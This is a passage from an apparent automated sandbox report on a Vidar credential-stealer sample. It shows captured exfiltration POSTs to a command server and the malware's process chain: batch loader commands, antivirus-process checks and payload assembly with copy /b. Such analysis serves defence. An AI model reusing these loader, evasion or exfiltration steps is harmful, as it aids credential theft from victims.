                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:59 UTC465OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------EGIIJDHCGCBKECBFIJKKCont
                                                                                2024-07-26 15:55:00 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:55:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.6641885.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:55:01 UTC325OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJ
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 131049
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IDHIIJJJKEGIDGCBAFIJCont
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 51 64 53 63 34 32 75 6c 72 2b 4a 2b 70 7a 6b 6f 77 69 2b 35 72 74 61 78 4c 7a 74 4b 6a 31 42 72 6b 76 45 58 67 32 7a 53 31 76 74 55 6a 75 5a 78 49 46 61 59 71 32 43 70 50 58 30 72 71 35 4c 69 4b 43 78 6b 65 35 66 37 50 48 43 77 56 6e 6c 49 41 41 79 4d 63 39 4f 34 2f 47 71 65 75 68 6c 38 4d 36 6d 6a 4e 75 32 77 74 67 34 37 59 7a 58 71 34 4b 39 43 71 70 55 74 4c 36 4f 33 71 63 47 50 70 77 72 30 57 71 71 76 5a 4e 72 37 6a 78 32 69 69 69 76 75 44 38 37 43 67 30 55 55 41 52 53 7a 52 77 4a 76 6b 62 61 75 63 5a 78 58 61 2b 43 76 47 66 68 2f 53 4e 47 6d 67 76 72 2f 79 70 57 75 43 34 58 79 5a 47 79 4e 71 6a 50 43 6e 30 4e 65 66 36 76 2f 78 36 4c 2f 31 30 48 38 6a 58 52 66 38 41 43 45 57 45 33 69 44 51 4c 65 33 6d 75 66 37 50 31 4b 7a 2b 30 79 53 4f 36 37 6b 77 70
                                                                                Data Ascii: QdSc42ulr+J+pzkowi+5rtaxLztKj1BrkvEXg2zS1vtUjuZxIFaYq2CpPX0rq5LiKCxke5f7PHCwVnlIAAyMc9O4/Gqeuhl8M6mjNu2wtg47YzXq4K9CqpUtL6O3qcGPpwr0WqqvZNr7jx2iiivuD87Cg0UUARSzRwJvkbaucZxXa+CvGfh/SNGmgvr/ypWuC4XyZGyNqjPCn0Nef6v/x6L/10H8jXRf8ACEWE3iDQLe3muf7P1Kz+0ySO67kwp
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 6e 74 6e 46 66 46 35 69 6d 38 58 57 53 64 74 56 2f 36 54 45 2f 54 63 72 6e 47 47 58 34 53 55 31 64 4b 4d 74 50 38 41 75 4a 55 4f 53 30 48 77 6b 2b 71 47 62 57 66 46 43 53 54 33 74 31 77 6b 4c 73 55 45 63 59 36 42 6c 55 67 5a 50 70 2f 58 4e 58 70 2f 68 2f 70 4c 33 43 76 62 76 4e 61 78 43 55 54 47 4b 49 4a 67 4d 50 37 72 46 53 79 6a 32 42 78 56 4e 66 48 74 32 39 79 4c 53 4c 52 59 35 62 6c 42 4d 30 79 70 65 67 6f 46 6a 53 4e 2f 6b 62 5a 38 78 49 6c 48 42 32 34 49 71 39 34 65 38 5a 52 2b 49 39 57 6e 74 72 61 47 32 53 33 6a 55 4d 6a 4e 64 6a 7a 33 55 6f 6a 42 76 4a 32 35 43 2f 4f 42 6e 50 55 56 77 4c 44 30 30 72 4e 58 50 54 6e 6d 6d 4b 6c 4e 79 6a 4b 79 36 4a 62 4a 64 45 6c 74 6f 4c 38 52 66 2b 52 45 31 4c 2f 74 6c 2f 36 4e 53 76 4c 75 61 39 52 2b 49 76 38 41
                                                                                Data Ascii: ntnFfF5im8XWSdtV/6TE/TcrnGGX4SU1dKMtP8AuJUOS0Hwk+qGbWfFCST3t1wkLsUEcY6BlUgZPp/XNXp/h/pL3CvbvNaxCUTGKIJgMP7rFSyj2BxVNfHt29yLSLRY5blBM0ypegoFjSN/kbZ8xIlHB24Iq94e8ZR+I9WntraG2S3jUMjNdjz3UojBvJ25C/OBnPUVwLD00rNXPTnmmKlNyjKy6JbJdEltoL8Rf+RE1L/tl/6NSvLua9R+Iv8A
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 32 30 55 44 71 68 53 41 4f 79 4b 7a 73 55 62 4c 45 71 65 41 42 30 7a 6e 6e 41 6a 65 37 31 46 39 64 31 4c 55 31 30 39 45 2b 31 32 52 74 55 67 45 70 32 77 76 6e 50 6d 71 63 64 64 35 64 73 66 37 52 71 48 54 62 5a 64 4f 74 4c 57 32 75 39 50 6e 75 54 61 49 55 74 35 37 61 34 45 54 71 6a 45 73 55 62 4b 4d 47 58 63 53 52 77 43 4d 6e 6b 39 75 4b 6e 4c 48 74 2f 76 4c 32 76 30 37 66 31 72 38 7a 30 71 73 63 72 55 58 37 4b 33 4e 30 76 33 38 2f 76 74 38 69 30 6d 71 32 6b 45 64 74 39 71 53 37 75 4a 72 74 57 6c 69 69 74 32 57 4d 70 45 48 5a 41 7a 45 71 33 4a 4b 74 38 6f 41 78 6a 72 7a 54 30 76 49 66 37 4e 75 4a 4a 4a 5a 42 64 48 7a 66 73 63 65 77 44 7a 66 4b 54 7a 4a 4d 6a 32 58 47 4d 64 7a 56 57 30 4a 6a 57 50 37 66 70 6b 38 7a 51 46 78 62 53 32 31 78 35 54 70 47 7a 46
                                                                                Data Ascii: 20UDqhSAOyKzsUbLEqeAB0znnAje71F9d1LU109E+12RtUgEp2wvnPmqcdd5dsf7RqHTbZdOtLW2u9PnuTaIUt57a4ETqjEsUbKMGXcSRwCMnk9uKnLHt/vL2v07f1r8z0qscrUX7K3N0v38/vt8i0mq2kEdt9qS7uJrtWliit2WMpEHZAzEq3JKt8oAxjrzT0vIf7NuJJJZBdHzfscewDzfKTzJMj2XGMdzVW0JjWP7fpk8zQFxbS21x5TpGzF
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 4b 6b 63 67 30 33 46 64 66 34 74 73 6e 6b 73 6f 74 56 61 43 32 58 7a 47 56 56 6c 67 6e 33 69 51 45 45 67 2f 64 41 50 41 36 35 72 6a 36 39 37 42 34 6e 36 78 53 35 37 57 65 7a 50 6c 4d 78 77 58 31 4f 74 37 4f 39 30 39 56 36 42 52 52 52 58 55 63 41 55 55 55 55 41 42 70 4b 55 30 6c 41 77 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 6d 41 55 6c 4c 52 51 4d 53 69 69 69 67 41 70 4b 4b 4b 41 43 69 69 6b 4e 41 77 6f 6f 6f 6f 41 53 69 69 69 67 59 55 55 55 55 41 49 61 4b 57 6b 70 6a 43 69 69 69 67 42 4b 4b 4b 4b 42 68 53 55 63 30 55 41 46 46 46 4a 51 4d 4b 54 38 4b 57 6b 35 6f 41 44 52 53 30 30 30 41 46 46 46 46 4d 59 55 6d 61 57 6b 6f 41 4b 4f 31 46 46 41 78 4b 4b 4b 53 6d 4d 4b 4b 4b 4f 61 41 43 6b 6f 6f 70 6a 43 6b 6f 6f 6f 41 4b 4b 4b 51 30 58 51 43 6d 6b 70 4d 30
                                                                                Data Ascii: Kkcg03Fdf4tsnksotVaC2XzGVVlgn3iQEEg/dAPA65rj697B4n6xS57WezPlMxwX1Ot7O909V6BRRRXUcAUUUUABpKU0lAwooooAKKKKACiiimAUlLRQMSiiigApKKKACiikNAwooooASiiigYUUUUAIaKWkpjCiiigBKKKKBhSUc0UAFFFJQMKT8KWk5oADRS000AFFFFMYUmaWkoAKO1FFAxKKKSmMKKKOaACkoopjCkoooAKKKQ0XQCmkpM0
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 2f 41 79 4b 6e 77 6e 44 76 39 34 30 33 36 59 70 58 2b 38 63 55 77 31 31 64 44 74 6a 73 48 58 2f 36 31 4e 49 70 78 70 68 36 56 4a 51 48 38 6a 53 48 38 61 58 70 53 64 61 4c 6c 43 45 6d 67 2b 78 6f 49 7a 53 55 6d 4d 4d 55 68 35 70 65 2f 76 6d 6b 4a 70 44 45 36 63 55 6e 4f 50 70 52 78 52 51 4e 42 53 64 76 65 6c 70 4f 39 49 59 45 59 70 76 57 6e 55 6e 51 64 4f 61 42 69 44 72 52 30 70 50 55 30 55 41 65 69 30 55 69 73 42 71 4f 6d 49 79 71 36 53 33 30 45 62 71 77 79 43 70 63 41 67 69 73 66 53 74 63 6c 31 52 34 48 76 62 65 7a 6a 4d 57 75 57 6c 75 72 78 51 4a 47 73 6b 63 72 73 47 6a 5a 56 41 55 38 4c 6e 4a 47 65 76 61 76 4e 78 4f 4f 6a 51 6d 6f 74 66 31 65 33 36 6e 69 34 4c 4b 35 34 75 6d 35 78 6c 61 33 2b 56 2f 30 4e 6a 76 53 31 68 36 4e 71 50 32 6c 56 4d 38 63 4a
                                                                                Data Ascii: /AyKnwnDv94036YpX+8cUw11dDtjsHX/61NIpxph6VJQH8jSH8aXpSdaLlCEmg+xoIzSUmMMUh5pe/vmkJpDE6cUnOPpRxRQNBSdvelpO9IYEYpvWnUnQdOaBiDrR0pPU0UAei0UisBqOmIyq6S30EbqwyCpcAgisfStcl1R4HvbezjMWuWlurxQJGskcrsGjZVAU8LnJGevavNxOOjQmotf1e36ni4LK54um5xla3+V/0NjvS1h6NqP2lVM8cJ
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 43 6b 6f 6f 70 32 47 47 61 53 6c 70 70 50 70 51 41 74 46 4e 4c 45 30 30 30 58 4b 73 4f 4a 48 72 54 64 31 46 4a 52 63 64 67 4a 35 35 70 4b 4b 4b 4c 6a 43 6d 30 34 30 30 30 44 43 6b 70 54 53 55 44 43 69 69 6b 4e 41 77 70 4b 55 30 6c 41 78 44 52 51 61 4b 41 45 70 4b 57 6b 6f 47 42 70 4b 4b 4b 43 72 43 47 67 30 47 6b 6f 42 42 53 47 6c 70 4b 42 68 6d 6b 7a 52 53 55 46 41 61 53 6a 4e 46 41 43 55 68 70 61 51 6d 67 59 6d 4b 4b 4d 30 55 46 43 55 55 55 6c 41 30 46 49 65 4b 57 6b 50 76 51 4d 53 6b 70 61 44 51 41 6e 2b 65 74 49 54 78 53 6d 6b 36 43 67 59 5a 70 44 30 70 54 53 47 67 61 45 6f 36 30 64 71 4b 59 78 4d 30 68 35 6f 4e 4c 30 46 49 59 6c 49 54 53 2b 39 4a 6d 67 70 42 36 30 6d 63 30 74 49 65 61 41 44 70 53 48 48 70 33 70 61 51 6e 39 4b 42 69 5a 6f 49 6f 70 4d
                                                                                Data Ascii: Ckoop2GGaSlppPpQAtFNLE000XKsOJHrTd1FJRcdgJ55pKKKLjCm04000DCkpTSUDCiikNAwpKU0lAxDRQaKAEpKWkoGBpKKKCrCGg0GkoBBSGlpKBhmkzRSUFAaSjNFACUhpaQmgYmKKM0UFCUUUlA0FIeKWkPvQMSkpaDQAn+etITxSmk6CgYZpD0pTSGgaEo60dqKYxM0h5oNL0FIYlITS+9JmgpB60mc0tIeaADpSHHp3paQn9KBiZoIopM
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 39 6e 59 62 6d 35 72 36 64 72 6e 56 2f 62 57 4f 35 48 42 72 58 54 57 32 76 33 62 61 6d 39 34 6d 31 36 4c 58 5a 4c 56 34 59 6e 69 38 70 57 44 42 38 48 4f 63 64 50 79 72 43 7a 55 7a 32 4e 39 46 62 6d 34 6b 30 2b 39 53 42 56 33 47 56 72 5a 77 6f 48 72 6b 6a 47 4b 62 4a 62 33 4d 45 63 55 6b 31 72 63 78 52 79 6b 43 4e 35 49 57 55 4f 54 30 43 6b 6a 6e 50 74 58 62 52 39 6a 53 67 6f 51 65 69 38 7a 7a 4d 52 39 59 72 31 48 56 71 52 64 33 35 45 56 46 4a 76 47 5a 42 7a 6d 4c 2f 57 44 42 2b 54 6e 48 50 70 79 63 63 39 36 63 69 50 4c 4b 6b 55 55 63 6b 73 72 2f 41 48 55 6a 51 73 7a 64 2b 41 4f 54 57 33 4e 47 31 37 6e 4e 79 53 76 61 32 6f 55 55 35 34 70 34 72 67 77 79 57 74 79 6b 77 49 42 6a 61 42 77 77 4a 42 49 34 78 33 41 4a 2f 41 2b 6c 52 65 59 70 51 4f 4d 6c 43 77 55
                                                                                Data Ascii: 9nYbm5r6drnV/bWO5HBrXTW2v3bam94m16LXZLV4Yni8pWDB8HOcdPyrCzUz2N9Fbm4k0+9SBV3GVrZwoHrkjGKbJb3MEcUk1rcxRykCN5IWUOT0CkjnPtXbR9jSgoQei8zzMR9Yr1HVqRd35EVFJvGZBzmL/WDB+TnHPpycc96ciPLKkUUcksr/AHUjQszd+AOTW3NG17nNySva2oUU54p4rgwyWtykwIBjaBwwJBI4x3AJ/A+lReYpQOMlCwU
                                                                                2024-07-26 15:55:01 UTC209OUTData Raw: 52 4a 42 50 4e 61 33 45 64 78 62 79 76 44 4e 45 34 65 4f 53 4e 69 72 49 77 4f 51 51 52 79 43 44 33 72 70 62 48 78 35 71 75 58 67 31 2b 57 66 78 42 70 30 67 47 2b 7a 31 43 35 64 77 47 48 33 57 52 69 53 55 59 48 75 4f 6f 4a 42 36 31 79 31 46 46 67 4f 67 31 44 78 76 34 6c 31 48 7a 34 35 4e 61 76 59 72 57 5a 54 47 62 4f 33 6e 65 4f 33 57 4d 6a 48 6c 72 47 44 74 43 34 34 78 6a 70 58 50 30 55 55 77 43 72 6b 6e 2f 41 43 42 62 58 2f 72 34 6d 2f 38 41 51 59 36 70 31 63 6b 2f 35 41 74 72 2f 77 42 66 45 33 2f 6f 4d 64 41 48 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a
                                                                                Data Ascii: RJBPNa3EdxbyvDNE4eOSNirIwOQQRyCD3rpbHx5quXg1+WfxBp0gG+z1C5dwGH3WRiSUYHuOoJB61y1FFgOg1Dxv4l1Hz45NavYrWZTGbO3neO3WMjHlrGDtC44xjpXP0UUwCrkn/ACBbX/r4m/8AQY6p1ck/5Atr/wBfE3/oMdAH/9k=------IDHIIJJJKEGIDGCBAFIJ--
                                                                                2024-07-26 15:55:02 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:55:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:55:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.6641895.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:55:03 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:55:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------KEHDHIDAEHCFHJJJJECACont
                                                                                2024-07-26 15:55:04 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:55:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:55:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:11:52:59
                                                                                Start date:26/07/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x400000
                                                                                File size:834'674 bytes
                                                                                MD5 hash:1B0FE9739EF19752CB12647B6A4BA97B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:11:53:02
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
                                                                                Imagebase:0x1c0000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:11:53:02
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:tasklist
                                                                                Imagebase:0xbd0000
                                                                                File size:79'360 bytes
                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                Imagebase:0x110000
                                                                                File size:29'696 bytes
                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:tasklist
                                                                                Imagebase:0xbd0000
                                                                                File size:79'360 bytes
                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                                Imagebase:0x110000
                                                                                File size:29'696 bytes
                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:cmd /c md 229536
                                                                                Imagebase:0x1c0000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:findstr /V "ReprintVerificationMercyRepository" Elliott
                                                                                Imagebase:0x110000
                                                                                File size:29'696 bytes
                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:cmd /c copy /b Exhibit + Rand + Hours 229536\U
                                                                                Imagebase:0x1c0000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Wow64 process (32bit):true
                                                                                Commandline:229536\Webster.pif 229536\U
                                                                                Imagebase:0xa80000
                                                                                File size:893'608 bytes
                                                                                MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 7%, ReversingLabs
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:12
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:timeout 5
                                                                                Imagebase:0xfe0000
                                                                                File size:25'088 bytes
                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:13.1%
